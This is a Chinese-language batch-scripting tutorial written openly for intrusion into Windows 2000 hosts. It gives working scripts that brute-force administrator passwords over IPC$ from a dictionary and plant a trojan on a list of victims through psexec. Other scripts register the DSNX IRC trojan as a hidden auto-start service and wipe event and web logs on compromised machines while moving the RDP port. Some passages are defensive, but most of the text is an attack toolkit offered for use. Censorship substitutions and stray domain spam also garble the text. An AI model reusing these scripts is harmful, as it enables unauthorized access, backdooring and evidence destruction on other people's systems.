%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充 

到找到的第一个完全合格的名称。如果环境变量 

未被定义，或者没有找到文件，此组合键会扩充 

空字符串 

 

可以组合修饰符来得到多重结果: 

 

%~dpI - 仅将 %I 扩充到一个驱动器号和路径 

%~nxI - 仅将 %I 扩充到一个文件名和扩展名 

%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 

%~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充 

到找到的第一个驱动器号和路径。 

%~ftzaI - 将 %I 扩充到类似输出线路的 DIR 

 

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法 

用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 

比较易读，而且避免与不分大小写的组合键混淆。 

 

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。 

 

sample2： 

利用For命令来实现对一台目标Win2k主机的暴力密码破解。 

我们用net use \\ip\ipc$ "password" /u:"不好意思该话已经被！！istrator"来尝试这和目标主机进行连接，当成功时记下密码。 

最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" 

/u:"不好意思该话已经被！！istrator" 

用i%来表示不好意思该话已经被！！的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－ 

for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" 

/u:"不好意思该话已经被！！istrator"|find ":命令成功完成">>D:\ok.txt ，这样就ko了。 

 

 

sample3： 

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化最讨厌这话常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。 

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable） 

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat 

%%i %%j %%k 

tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 

而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If 

errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。 

delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i 

%%j %%k表示的对象来排列，一般就是 ip password username。 

代码雏形： 

--------------- cut here then save as a batchfile(I call it main.bat ) 

--------------------------- 

@echo off 

@if "%1"=="" goto usage 

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call 

IPChack.bat %%i %%j %%k 

@goto end 

:usage 

@echo run this batch in dos modle.or just double-click it. 

:end 

--------------- cut here then save as a batchfile(I call it main.bat ) 

--------------------------- 

 

------------------- cut here then save as a batchfile(I call it door.bat) 

----------------------------- 

@net use \\%1\ipc$ %3 /u:"%2" 

@if errorlevel 1 goto failed 

@echo Trying to establish the IPC$ connection …………OK 

@copy windrv32.exe\\%1\不好意思该话已经被！！$\system32 && if not errorlevel 1 echo IP %1 

USER %2 PWD %3 >>ko.txt 

@psexec \\%1 c:\winnt\system32\windrv32.exe 

@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored 

>>ko.txt 

:failed 

@echo Sorry can not connected to the victim. 

----------------- cut here then save as a batchfile(I call it door.bat) 

-------------------------------- 

这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容 

尚可扩展,例如:加入清除最讨厌这话志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 

 

 

二.如何在批处理文件中使用参数 

批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。 

sample1：fomat.bat 

@echo off 

if "%1"=="a" format a: 

:format 

@format a:/q/u/auotset 

@echo please insert another disk to driver A. 

@pause 

@goto fomat 

这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添足了～_ 

sample2： 

当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password 

username 当着参数来赋给这个批处理，这样就不用每次都打命令了。 

@echo off 

@net use \\1%\ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。 

@if errorlevel 1 echo connection failed 

怎么样,使用参数还是比较简单的吧？你这么帅一定学会了_.No.3 

三.如何使用组合命令(Compound Command) 

 

1.& 

Usage：第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令，而不管命令是否执行成功 

Sample： 

C:\>dir z: & dir c:\Ex4rch 

The system cannot find the path specified. 

Volume in drive C has no label. 

Volume Serial Number is 0078-59FB 

 

Directory of c:\Ex4rch 

2002-05-14 23:51 <DIR> . 

2002-05-14 23:51 <DIR> .. 

2002-05-14 23:51 14 sometips.gif 

 

2.&& 

Usage：第一条命令 && 第二条命令 [&& 第三条命令...] 

用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令； 

 

 

Sample： 

C:\>dir z: && dir c:\Ex4rch 

The system cannot find the path specified. 

 

 

C:\>dir c:\Ex4rch && dir z: 

Volume in drive C has no label. 

Volume Serial Number is 0078-59FB 

 

Directory of c:\Ex4rch 

 

2002-05-14 23:55 <DIR> . 

2002-05-14 23:55 <DIR> .. 

2002-05-14 23:55 14 sometips.gif 

1 File(s) 14 bytes 

2 Dir(s) 768,671,744 bytes free 

The system cannot find the path specified. 

 

wwwf.cn rwww.cn  j77.cn ddxc.com jkjj.com  baidu.com google.com 

在做备份的时候可能会用到这种命令会比较简单，如： 

dir file://192.168.0.1/database/backup.mdb && copy 

file://192.168.0.1/database/backup.mdb E:\backup 

如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 ：） 

 

 

3.|| 

 

Usage：第一条命令 || 第二条命令 [|| 第三条命令...] 

 

用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令； 

 

Sample： 

C:\Ex4rch>dir sometips.gif || del sometips.gif 

Volume in drive C has no label. 

Volume Serial Number is 0078-59FB 

 

Directory of C:\Ex4rch 

 

2002-05-14 23:55 14 sometips.gif 

1 File(s) 14 bytes 

0 Dir(s) 768,696,320 bytes free 

 

组合命令使用的例子： 

sample： 

@copy trojan.exe \\%1\不好意思该话已经被！！$\system32 && if not errorlevel 1 echo IP %1 

USER %2 PASS %3 >>victim.txt 

 

四、管道命令的使用 

 

1.| 命令 

Usage：第一条命令 | 第二条命令 [| 第三条命令...] 

将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。 

 

sample： 

time /t>>D:\IP.log 

netstat -n -p tcp|find ":3389">>D:\IP.log 

start Explorer 

看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。 

 

2.>、>>输出重定向命令 

将一条命令或某个程序输出结果的重定向到特定文件中, > 与 

>>的区别在于，>会清除调原有文件中的内容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。 

 

sample1： 

echo hello world>c:\hello.txt (stupid example?) 

 

sample2: 

时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录： 

 

运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 

这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 

最讨厌这话后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 

这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: 

CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt 

dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32 

/u trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 

 

3.< 、>& 、<& 

< 从文件中而不是从键盘中读入命令输入。 

>& 将一个句柄的输出写入到另一个句柄的输入中。 

<& 从一个句柄读取输入并将其写入到另一个句柄输出中。 

这些并不常用，也就不多做介绍。 

 

No.5 

五.如何用批处理文件来又讲粗话作注册表 

 

在入侵过程中经常回又讲粗话作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表又讲粗话作有一定的了解。下面我们就先学习一下如何使用.REG文件来又讲粗话作注册表.(我们可以用批处理来生成一个REG文件) 

 

关于注册表的又讲粗话作，常见的是创建、修改、删除。 

 

1.创建 

创建分为两种，一种是创建子项(Subkey) 

 

我们创建一个文件，内容如下： 

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。 

另一种是创建一个项目名称 

那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下： 

 

Windows Registry Editor Version 5.00 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

"Invader"="Ex4rch" 

"Door"=C:\\WINNT\\system32\\door.exe 

"Autodos"=dword:02 

 

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 

新建了:Invader、door、about这三个项目 

Invader的类型是“String Value” 

door的类型是“REG SZ Value” 

Autodos的类型是“DWORD Value” 

 

 

 

 

 

2.修改 

修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。 

 

 

 

 

3.删除 

我们首先来说说删除一个项目名称，我们创建一个如下的文件： 

 

 

 

 

Windows Registry Editor Version 5.00 

 

 

 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

"Ex4rch"=- 

 

 

 

 

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了； 

 

 

 

 

 

我们再看看删除一个子项，我们创建一个如下的脚本： 

 

 

 

 

Windows Registry Editor Version 5.00 

 

 

 

 

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

 

 

 

 

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。 

 

 

 

 

 

相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。 

 

 

 

 

 

samlpe1:如上面的那个例子,如想生成如下注册表文件 

Windows Registry Editor Version 5.00 

 

 

 

 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

"Invader"="Ex4rch" 

"door"=hex:255 

"Autodos"=dword:000000128 

只需要这样： 

@echo Windows Registry Editor Version 5.00>>Sample.reg 

 

 

 

 

@echo 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg 

 

 

 

 

@echo "Invader"="Ex4rch">>Sample.reg 

@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg 

@echo "Autodos"=dword:02>>Sample.reg 

 

 

 

 

 

samlpe2: 

我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe) 

 

 

 

 

@start windrv32.exe 

@attrib +h +r windrv32.exe 

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 

>>patch.dll 

@echo "windsnx "=- >>patch.dll 

@sc.exe create Windriversrv type= kernel start= auto displayname= 

WindowsDriver binpath= c:\winnt\system32\windrv32.exe 

@regedit /s patch.dll 

@delete patch.dll 

 

 

 

 

@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动] 

@REM 这样不是更安全_. 

 

 

 

 

六.精彩实例放送。 

1.删除win2k/xp系统默认共享的批处理 

------------------------ cut here then save as .bat or .cmd file 

--------------------------- 

 

 

 

 

@echo preparing to delete all the default shares.when ready pres any key. 

@pause 

@echo off 

 

 

 

 

:Rem check parameters if null show usage. 

if {%1}=={} goto :Usage 

 

 

 

 

:Rem code start. 

echo. 

echo ------------------------------------------------------ 

echo. 

echo Now deleting all the default shares. 

echo. 

net share %1$ /delete 

net share %2$ /delete 

net share %3$ /delete 

net share %4$ /delete 

net share %5$ /delete 

net share %6$ /delete 

net share %7$ /delete 

net share %8$ /delete 

net share %9$ /delete 

net stop Server 

net start Server 

echo. 

echo All the shares have been deleteed 

echo. 

echo ------------------------------------------------------ 

echo. 

echo Now modify the registry to change the system default properties. 

echo. 

echo Now creating the registry file 

echo Windows Registry Editor Version 5.00> c:\delshare.reg 

echo 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> 

c:\delshare.reg 

echo "AutoShareWks"=dword:00000000>> c:\delshare.reg 

echo "AutoShareServer"=dword:00000000>> c:\delshare.reg 

echo Nowing using the registry file to chang the system default 

properties. 

regedit /s c:\delshare.reg 

echo Deleting the temprotarily files. 

del c:\delshare.reg 

goto :END 

 

 

 

 

:Usage 

echo. 

echo ------------------------------------------------------ 

echo. 

echo ☆ A example for batch file ☆ 

echo ☆ [Use batch file to change the sysytem share properties.] ☆ 

echo. 

echo Author：Ex4rch 

echo Mail:Ex4rch@hotmail.com QQ:1672602 

echo. 

echo Error：Not enough parameters 

echo. 

echo ☆ Please enter the share disk you wanna delete ☆ 

echo. 

echo For instance，to delete the default shares: 

echo delshare c d e ipc 不好意思该话已经被！！ print 

echo. 

echo If the disklable is not as C: D: E: ，Please chang it youself. 

echo. 

echo example： 

echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the 

command into ： 

echo delshare c d e x y z ipc 不好意思该话已经被！！ print 

echo. 

echo 我是小 you can delete nine shares once in a useing 我是小 

echo. 

echo ------------------------------------------------------ 

goto :EOF 

 

 

 

 

:END 

echo. 

echo ------------------------------------------------------ 

echo. 

echo OK,delshare.bat has deleted all the share you assigned. 

echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. 

echo 

echo. 

echo ------------------------------------------------------ 

echo. 

 

 

 

 

:EOF 

echo end of the batch file 

------------------------ cut here then save as .bat or .cmd file 

--------------------------- 

 

 

 

 

 

2.全面加固系统（给肉鸡打补丁）的批处理文件 

------------------------ cut here then save as .bat or .cmd file 

--------------------------- 

 

 

 

 

@echo Windows Registry Editor Version 5.00 >patch.dll 

@echo 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] 

>>patch.dll 

 

 

 

 

@echo "AutoShareServer"=dword:00000000 >>patch.dll 

@echo "AutoShareWks"=dword:00000000 >>patch.dll 

@REM [禁止共享] 

 

 

 

 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] 

>>patch.dll 

@echo "restrictanonymous"=dword:00000001 >>patch.dll 

@REM [禁止匿名登录] 

 

 

 

 

@echo 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 

>>patch.dll 

@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll 

@REM [禁止及文件访问和打印共享] 

 

 

 

 

@echo 

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] 

>>patch.dll 

@echo "Start"=dword:00000004 >>patch.dll 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] 

>>patch.dll 

@echo "Start"=dword:00000004 >>patch.dll 

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows 

NT\CurrentVersion\Winlogon] >>patch.dll 

@echo "ShutdownWithoutLogon"="0" >>patch.dll 

@REM [禁止登录前关机] 

 

 

 

 

@echo "DontDisplayLastUserName"="1" >>patch.dll 

@REM [禁止显示前一个登录用户名称] 

@regedit /s patch.dll 

 

 

 

 

------------------------ cut here then save as .bat or .cmd file 

--------------------------- 

 

 

 

 

下面命令是清除肉鸡所有最讨厌这话志，禁止一些危险的服务，并修改肉鸡的terminnal service留跳后路。 

@regedit /s patch.dll 

@net stop w3svc 

@net stop event log 

@del c:\winnt\system32\logfiles\w3svc1\*.* /f /q 

@del c:\winnt\system32\logfiles\w3svc2\*.* /f /q 

@del c:\winnt\system32\config\*.event /f /q 

@del c:\winnt\system32dtclog\*.* /f /q 

@del c:\winnt\*.txt /f /q 

@del c:\winnt\*.log /f /q 

@net start w3svc 

@net start event log 

@rem [删除最讨厌这话志] 

 

 

 

 

 

@net stop lanmanserver /y 

@net stop Schedule /y 

@net stop RemoteRegistry /y 

@del patch.dll 

@echo The server has been patched,Have fun. 

@del patch.bat 

@REM [禁止一些危险的服务。] 

 

 

 

 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 

Server\WinStations\RDP-Tcp] >>patch.dll 

@echo "PortNumber"=dword:00002010 >>patch.dll 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal 

Server\Wds\rdpwd\Tds\tcp >>patch.dll 

@echo "PortNumber"=dword:00002012 >>patch.dll 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] 

>>patch.dll 

@echo "Start"=dword:00000002 >>patch.dll 

@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] 

>>patch.dll 

@echo "Start"=dword:00000002 >>patch.dll